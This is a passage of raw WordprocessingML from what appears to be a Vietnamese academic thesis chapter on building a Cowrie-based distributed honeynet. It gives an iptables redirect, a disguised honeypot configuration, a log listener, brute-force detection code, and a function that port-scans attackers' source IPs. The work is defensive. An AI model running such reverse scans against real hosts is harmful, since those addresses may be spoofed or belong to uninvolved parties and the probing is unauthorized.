        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:type="auto" w:w="0"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
        <w:jc w:val="center"/>
        <w:tblBorders>
          <w:top w:val="single" w:sz="8" w:space="0" w:color="1E293B"/>
          <w:bottom w:val="single" w:sz="8" w:space="0" w:color="1E293B"/>
          <w:left w:val="none"/>
          <w:right w:val="none"/>
          <w:insideH w:val="single" w:sz="4" w:space="0" w:color="CBD5E1"/>
          <w:insideV w:val="single" w:sz="4" w:space="0" w:color="E2E8F0"/>
        </w:tblBorders>
        <w:tblCellMar>
          <w:top w:w="120" w:type="dxa"/>
          <w:bottom w:w="120" w:type="dxa"/>
          <w:left w:w="160" w:type="dxa"/>
          <w:right w:w="160" w:type="dxa"/>
        </w:tblCellMar>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9403"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9403"/>
            <w:shd w:fill="1E293B"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="80" w:after="80"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>📌 GHI CHÚ HỌC THUẬT: ĐỘT PHÁ CỦA MÔ HÌNH HONEYNET PHÂN TÁN TRONG TÁC CHIẾN ACTIVE DEFENSE &amp; SOAR:</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Kiến trúc Honeynet Phân tán cho phép hệ thống mở rộng từ mô hình bẫy mồi phòng thí nghiệm đơn lẻ thành mạng lưới cảm biến đan xen (Sensor Mesh) cấp doanh nghiệp. Điểm đột phá kỹ thuật nằm ở cơ chế tương quan Cross-Subnet: Kẻ tấn công cho dù sử dụng kỹ thuật trinh sát phân tán chậm (Slow-and-Low Scan) để lẩn tránh IDS/IPS truyền thống vẫn sẽ bị vạch trần ngay khi chạm vào 2 bẫy mồi ở các phân vùng mạng khác nhau.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="80" w:line="312" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="312" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="120" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="003366"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>CHƯƠNG 4: HIỆN THỰC HÓA VÀ MÃ NGUỒN CÁC PHÂN HỆ</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="120" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="142850"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>4.1 Môi trường Triển khai và Cấu hình Tùy biến Cowrie Honeypot</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Hệ thống được triển khai trên nền tảng máy chủ Linux Ubuntu Server 22.04 LTS (64-bit). Nhằm biến Cowrie từ một máy bẫy mặc định dễ bị phát hiện thành một máy chủ sản xuất thực tế (Realistic Production Server), các cấu hình tùy biến chuyên sâu đã được thực hiện:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>1. Chuyển dịch Cổng Dịch vụ (Port Redirection): Cổng SSH thực tế dùng để quản trị máy chủ được đổi từ cổng 22 sang cổng bí mật 54322. Cổng mặc định 22 của hệ thống được chuyển hướng (NAT Port Forwarding) về cổng 2222 của Cowrie Honeypot bằng lệnh iptables:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:type="auto" w:w="0"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
        <w:jc w:val="center"/>
        <w:tblBorders>
          <w:top w:val="single" w:sz="8" w:space="0" w:color="1E293B"/>
          <w:bottom w:val="single" w:sz="8" w:space="0" w:color="1E293B"/>
          <w:left w:val="none"/>
          <w:right w:val="none"/>
          <w:insideH w:val="single" w:sz="4" w:space="0" w:color="CBD5E1"/>
          <w:insideV w:val="single" w:sz="4" w:space="0" w:color="E2E8F0"/>
        </w:tblBorders>
        <w:tblCellMar>
          <w:top w:w="120" w:type="dxa"/>
          <w:bottom w:w="120" w:type="dxa"/>
          <w:left w:w="160" w:type="dxa"/>
          <w:right w:w="160" w:type="dxa"/>
        </w:tblCellMar>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9403"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9403"/>
            <w:shd w:fill="1E293B"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="80" w:after="80" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>iptables -t nat -A PREROUTING -p tcp --dport 22 -j REDIRECT --to-port 2222</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="120" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Lệnh iptables chuyển hướng lưu lượng SSH từ cổng 22 sang cổng bẫy 2222</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>2. Cấu hình Tùy biến File 'cowrie.cfg': Thay đổi Hostname mặc định từ 'svr04' thành 'corp-db-master-01' và giả lập phiên bản OpenSSH chuẩn của Ubuntu (OpenSSH_8.9p1 Ubuntu-3ubuntu0.4) nhằm đánh lừa các công cụ quét chuyên nghiệp như Nmap OS detection:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:type="auto" w:w="0"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
        <w:jc w:val="center"/>
        <w:tblBorders>
          <w:top w:val="single" w:sz="8" w:space="0" w:color="1E293B"/>
          <w:bottom w:val="single" w:sz="8" w:space="0" w:color="1E293B"/>
          <w:left w:val="none"/>
          <w:right w:val="none"/>
          <w:insideH w:val="single" w:sz="4" w:space="0" w:color="CBD5E1"/>
          <w:insideV w:val="single" w:sz="4" w:space="0" w:color="E2E8F0"/>
        </w:tblBorders>
        <w:tblCellMar>
          <w:top w:w="120" w:type="dxa"/>
          <w:bottom w:w="120" w:type="dxa"/>
          <w:left w:w="160" w:type="dxa"/>
          <w:right w:w="160" w:type="dxa"/>
        </w:tblCellMar>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9403"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9403"/>
            <w:shd w:fill="1E293B"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="80" w:after="80" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>[honeypot]</w:t>
              <w:br/>
              <w:t>hostname = corp-db-master-01</w:t>
              <w:br/>
              <w:t>log_path = var/log/cowrie</w:t>
              <w:br/>
              <w:t>download_path = var/lib/cowrie/downloads</w:t>
              <w:br/>
              <w:t>contents_path = share/cowrie/contents</w:t>
              <w:br/>
              <w:t>txtcmds_path = share/cowrie/txtcmds</w:t>
              <w:br/>
              <w:br/>
              <w:t>[ssh]</w:t>
              <w:br/>
              <w:t>enabled = true</w:t>
              <w:br/>
              <w:t>listen_endpoints = tcp:2222:interface=0.0.0.0</w:t>
              <w:br/>
              <w:t>version = SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.4</w:t>
              <w:br/>
              <w:br/>
              <w:t>[output_json]</w:t>
              <w:br/>
              <w:t>enabled = true</w:t>
              <w:br/>
              <w:t>logfile = var/log/cowrie/cowrie.json</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="120" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Trích đoạn cấu hình tùy biến máy bẫy trong tệp tin cowrie.cfg</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="120" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="142850"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>4.2 Chi tiết Mã nguồn Phân hệ Thu thập Log Streaming (cowrie_listener.py)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Phân hệ 'CowrieLogListener' được hiện thực hóa với lớp đối tượng chuyên trách theo dõi sự thay đổi của tệp tin log 'cowrie.json'. Khi phát hiện có dòng dữ liệu mới, module lập tức chuyển đổi chuỗi JSON thành dictionary và gọi hàm callback bất đồng bộ:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:type="auto" w:w="0"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
        <w:jc w:val="center"/>
        <w:tblBorders>
          <w:top w:val="single" w:sz="8" w:space="0" w:color="1E293B"/>
          <w:bottom w:val="single" w:sz="8" w:space="0" w:color="1E293B"/>
          <w:left w:val="none"/>
          <w:right w:val="none"/>
          <w:insideH w:val="single" w:sz="4" w:space="0" w:color="CBD5E1"/>
          <w:insideV w:val="single" w:sz="4" w:space="0" w:color="E2E8F0"/>
        </w:tblBorders>
        <w:tblCellMar>
          <w:top w:w="120" w:type="dxa"/>
          <w:bottom w:w="120" w:type="dxa"/>
          <w:left w:w="160" w:type="dxa"/>
          <w:right w:w="160" w:type="dxa"/>
        </w:tblCellMar>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9403"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9403"/>
            <w:shd w:fill="1E293B"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="80" w:after="80" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>class CowrieLogListener:</w:t>
              <w:br/>
              <w:t xml:space="preserve">    def __init__(self, log_file_path: str, poll_interval: float = 0.5):</w:t>
              <w:br/>
              <w:t xml:space="preserve">        self.log_file_path = log_file_path</w:t>
              <w:br/>
              <w:t xml:space="preserve">        self.poll_interval = poll_interval</w:t>
              <w:br/>
              <w:t xml:space="preserve">        self._running = False</w:t>
              <w:br/>
              <w:t xml:space="preserve">        self._last_position = 0</w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve">    def start(self, callback: Callable[[dict], None]) -&gt; None:</w:t>
              <w:br/>
              <w:t xml:space="preserve">        self._running = True</w:t>
              <w:br/>
              <w:t xml:space="preserve">        with open(self.log_file_path, "r", encoding="utf-8") as f:</w:t>
              <w:br/>
              <w:t xml:space="preserve">            f.seek(0, os.SEEK_END) # Nhảy tới cuối tệp để đón log mới</w:t>
              <w:br/>
              <w:t xml:space="preserve">            while self._running:</w:t>
              <w:br/>
              <w:t xml:space="preserve">                line = f.readline()</w:t>
              <w:br/>
              <w:t xml:space="preserve">                if not line:</w:t>
              <w:br/>
              <w:t xml:space="preserve">                    time.sleep(self.poll_interval)</w:t>
              <w:br/>
              <w:t xml:space="preserve">                    continue</w:t>
              <w:br/>
              <w:t xml:space="preserve">                try:</w:t>
              <w:br/>
              <w:t xml:space="preserve">                    event = json.loads(line.strip())</w:t>
              <w:br/>
              <w:t xml:space="preserve">                    callback(event)</w:t>
              <w:br/>
              <w:t xml:space="preserve">                except json.JSONDecodeError:</w:t>
              <w:br/>
              <w:t xml:space="preserve">                    continue</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="120" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Hiện thực hóa cơ chế Streaming Log Parser trong core/cowrie_listener.py</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="120" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="142850"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>4.3 Chi tiết Mã nguồn Động cơ Tương quan Sự kiện (correlation_engine.py)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Lớp 'EventCorrelationEngine' cài đặt cấu trúc dữ liệu ThreatAlert cùng thuật toán Cửa sổ Thời gian Trượt. Module quản lý bộ đếm các lần đăng nhập thất bại theo từng IP nguồn và kiểm tra thời gian tồn tại trong danh sách để phát hiện tấn công brute-force chuẩn xác:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:type="auto" w:w="0"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
        <w:jc w:val="center"/>
        <w:tblBorders>
          <w:top w:val="single" w:sz="8" w:space="0" w:color="1E293B"/>
          <w:bottom w:val="single" w:sz="8" w:space="0" w:color="1E293B"/>
          <w:left w:val="none"/>
          <w:right w:val="none"/>
          <w:insideH w:val="single" w:sz="4" w:space="0" w:color="CBD5E1"/>
          <w:insideV w:val="single" w:sz="4" w:space="0" w:color="E2E8F0"/>
        </w:tblBorders>
        <w:tblCellMar>
          <w:top w:w="120" w:type="dxa"/>
          <w:bottom w:w="120" w:type="dxa"/>
          <w:left w:w="160" w:type="dxa"/>
          <w:right w:w="160" w:type="dxa"/>
        </w:tblCellMar>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9403"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9403"/>
            <w:shd w:fill="1E293B"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="80" w:after="80" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t># Xử lý phát hiện Brute Force T1110.001</w:t>
              <w:br/>
              <w:t>if eventid == "cowrie.login.failed":</w:t>
              <w:br/>
              <w:t xml:space="preserve">    self.failed_logins[src_ip] = [</w:t>
              <w:br/>
              <w:t xml:space="preserve">        t for t in self.failed_logins[src_ip] if now - t &lt;= self.window_seconds</w:t>
              <w:br/>
              <w:t xml:space="preserve">    ]</w:t>
              <w:br/>
              <w:t xml:space="preserve">    self.failed_logins[src_ip].append(now)</w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve">    if len(self.failed_logins[src_ip]) &gt;= self.brute_force_threshold:</w:t>
              <w:br/>
              <w:t xml:space="preserve">        count = len(self.failed_logins[src_ip])</w:t>
              <w:br/>
              <w:t xml:space="preserve">        self.failed_logins[src_ip].clear()</w:t>
              <w:br/>
              <w:t xml:space="preserve">        return ThreatAlert(</w:t>
              <w:br/>
              <w:t xml:space="preserve">            alert_id=f"ALT-BRUTE-{int(now)}",</w:t>
              <w:br/>
              <w:t xml:space="preserve">            rule_name="Dò quét mật khẩu diện rộng (SSH Brute Force Attack)",</w:t>
              <w:br/>
              <w:t xml:space="preserve">            mitre_technique_id="T1110.001",</w:t>
              <w:br/>
              <w:t xml:space="preserve">            mitre_technique_name="Brute Force: Password Guessing",</w:t>
              <w:br/>
              <w:t xml:space="preserve">            severity="HIGH",</w:t>
              <w:br/>
              <w:t xml:space="preserve">            source_ip=src_ip,</w:t>
              <w:br/>
              <w:t xml:space="preserve">            timestamp=timestamp,</w:t>
              <w:br/>
              <w:t xml:space="preserve">            details={"failed_attempts": count, "target_user": username},</w:t>
              <w:br/>
              <w:t xml:space="preserve">            recommended_action="tarpit_and_block",</w:t>
              <w:br/>
              <w:t xml:space="preserve">        )</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="120" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Đoạn mã thuật toán cửa sổ trượt trong core/correlation_engine.py</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="120" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="142850"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>4.4 Chi tiết Mã nguồn Phân hệ Trinh sát ngược Kẻ tấn công (reverse_intel.py)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Lớp 'ReverseIntelligenceEngine' tổng hợp các hàm trinh sát đa nguồn: 'lookup_geoip', 'lookup_abuseipdb', 'lookup_shodan' và 'safe_reverse_port_scan'. Hàm quét cổng ngược sử dụng socket TCP với thời gian chờ 300ms, kết hợp hàm '_classify_threat' để suy luận hình thái đối thủ:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:type="auto" w:w="0"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
        <w:jc w:val="center"/>
        <w:tblBorders>
          <w:top w:val="single" w:sz="8" w:space="0" w:color="1E293B"/>
          <w:bottom w:val="single" w:sz="8" w:space="0" w:color="1E293B"/>
          <w:left w:val="none"/>
          <w:right w:val="none"/>
          <w:insideH w:val="single" w:sz="4" w:space="0" w:color="CBD5E1"/>
          <w:insideV w:val="single" w:sz="4" w:space="0" w:color="E2E8F0"/>
        </w:tblBorders>
        <w:tblCellMar>
          <w:top w:w="120" w:type="dxa"/>
          <w:bottom w:w="120" w:type="dxa"/>
          <w:left w:w="160" w:type="dxa"/>
          <w:right w:w="160" w:type="dxa"/>
        </w:tblCellMar>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9403"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9403"/>
            <w:shd w:fill="1E293B"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="80" w:after="80" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>def safe_reverse_port_scan(self, ip: str, ports: Optional[List[int]] = None) -&gt; List[int]:</w:t>
              <w:br/>
              <w:t xml:space="preserve">    if ports is None:</w:t>
              <w:br/>
              <w:t xml:space="preserve">        ports = [21, 22, 23, 80, 443, 1080, 3128, 3389, 8080, 8888]</w:t>
              <w:br/>
              <w:t xml:space="preserve">    open_ports = []</w:t>
              <w:br/>
              <w:t xml:space="preserve">    for port in ports:</w:t>
              <w:br/>
              <w:t xml:space="preserve">        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)</w:t>
              <w:br/>
              <w:t xml:space="preserve">        s.settimeout(0.3)</w:t>
              <w:br/>
              <w:t xml:space="preserve">        try:</w:t>
              <w:br/>
              <w:t xml:space="preserve">            if s.connect_ex((ip, port)) == 0:</w:t>
              <w:br/>
              <w:t xml:space="preserve">                open_ports.append(port)</w:t>
              <w:br/>
              <w:t xml:space="preserve">        except Exception:</w:t>
              <w:br/>
              <w:t xml:space="preserve">            pass</w:t>
              <w:br/>
              <w:t xml:space="preserve">        finally:</w:t>
              <w:br/>
              <w:t xml:space="preserve">            s.close()</w:t>
              <w:br/>
              <w:t xml:space="preserve">    return open_ports</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="120" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Hiện thực hóa quét cổng ngược an toàn trong core/reverse_intel.py</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="120" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="142850"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>4.5 Chi tiết Mã nguồn Bẫy mồi Honeytoken &amp; Khử ẩn danh (honeytoken_manager.py)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Lớp 'HoneytokenManager' tự động sinh các tệp tin giả lập nhạy cảm có gắn mã nhận dạng duy nhất (UUID Canary Tokens). Khi kẻ tấn công kích hoạt Webhook, hàm 'process_beacon_callback' bóc tách các trường HTTP Header để lấy IP thật của kẻ tấn công:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:type="auto" w:w="0"/>
